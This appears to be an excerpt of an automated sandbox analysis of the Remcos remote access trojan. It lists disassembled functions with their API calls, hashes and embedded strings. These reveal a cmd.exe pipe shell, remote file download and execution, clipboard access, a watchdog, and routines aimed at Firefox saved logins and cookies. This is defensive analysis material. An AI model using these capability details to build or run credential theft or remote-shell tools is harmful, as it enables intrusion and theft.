                                                                                                        • API String ID: 2742660187-671089009
                                                                                                        • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                        • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                                        • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                        • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                                        APIs
                                                                                                          • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                                        • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CodeInfoPageValid
                                                                                                        • String ID:
                                                                                                        • API String ID: 546120528-0
                                                                                                        • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                        • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                                        • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                        • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                          • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                          • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                          • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                        • _free.LIBCMT ref: 0044F050
                                                                                                        • _free.LIBCMT ref: 0044F086
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 2991157371-0
                                                                                                        • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                        • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                                        • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                        • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                                        APIs
                                                                                                        • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 2279764990-0
                                                                                                        • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                        • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                        • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                        • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                        APIs
                                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8), ref: 0041CB9A
                                                                                                        • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FormatFreeLocalMessage
                                                                                                        • String ID:
                                                                                                        • API String ID: 1427518018-0
                                                                                                        • Opcode ID: 82b7d99133a533cf28a51f4fe1ebea5b1148f2cd1554d609742055ada2217fc8
                                                                                                        • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                                                                                        • Opcode Fuzzy Hash: 82b7d99133a533cf28a51f4fe1ebea5b1148f2cd1554d609742055ada2217fc8
                                                                                                        • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                                                                                        APIs
                                                                                                        • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                          • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateEventStartupsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 1953588214-0
                                                                                                        • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                        • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                                        • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                        • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                                                        • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                        • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                                                        • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                        APIs
                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                          • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                          • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                          • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                          • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                          • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                          • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                          • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                          • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 1170566393-0
                                                                                                        • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                        • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                                                        • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                        • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                                                        APIs
                                                                                                          • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                        • String ID:
                                                                                                        • API String ID: 806969131-0
                                                                                                        • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                        • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                        • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                        • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __alldvrm
                                                                                                        • String ID:
                                                                                                        • API String ID: 65215352-0
                                                                                                        • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                        • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                        • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                        • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                        • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                        • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                        • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                        APIs
                                                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Startup
                                                                                                        • String ID:
                                                                                                        • API String ID: 724789610-0
                                                                                                        • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                        • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                                        • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                        • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: send
                                                                                                        • String ID:
                                                                                                        • API String ID: 2809346765-0
                                                                                                        • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                        • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                        • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                        • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                          • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                          • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                          • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                        • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                          • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                          • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                          • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                          • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                        • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                          • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                        • API String ID: 1067849700-181434739
                                                                                                        • Opcode ID: 5b6b51f376dc1a29f5d412b65b2f6b9fe0a547cdcff5020535f42392f31964cb
                                                                                                        • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                        • Opcode Fuzzy Hash: 5b6b51f376dc1a29f5d412b65b2f6b9fe0a547cdcff5020535f42392f31964cb
                                                                                                        • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                        APIs
                                                                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                        • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                                        • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                        • API String ID: 2994406822-18413064
                                                                                                        • Opcode ID: 6f7b71f765c604854d5b0b254253e6a0232bcbf02d2927cfc2787c6e160bae95
                                                                                                        • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                                        • Opcode Fuzzy Hash: 6f7b71f765c604854d5b0b254253e6a0232bcbf02d2927cfc2787c6e160bae95
                                                                                                        • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                          • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                          • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                          • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                        • OpenMutexA.KERNEL32 ref: 00412181
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                        • API String ID: 3018269243-13974260
                                                                                                        • Opcode ID: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                                                                        • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                        • Opcode Fuzzy Hash: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                                                                        • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                        • API String ID: 1164774033-3681987949
                                                                                                        • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                                        • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                        • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                                        • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32 ref: 004168FD
                                                                                                        • EmptyClipboard.USER32 ref: 0041690B
                                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                        • CloseClipboard.USER32 ref: 00416990
                                                                                                        • OpenClipboard.USER32 ref: 00416997
                                                                                                        • GetClipboardData.USER32 ref: 004169A7
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                        • CloseClipboard.USER32 ref: 004169BF
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                        • String ID: !D@
                                                                                                        • API String ID: 3520204547-604454484
                                                                                                        • Opcode ID: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                                                                        • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                        • Opcode Fuzzy Hash: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                                                                        • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                        • API String ID: 3527384056-432212279
                                                                                                        • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                                        • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                        • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                                        • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
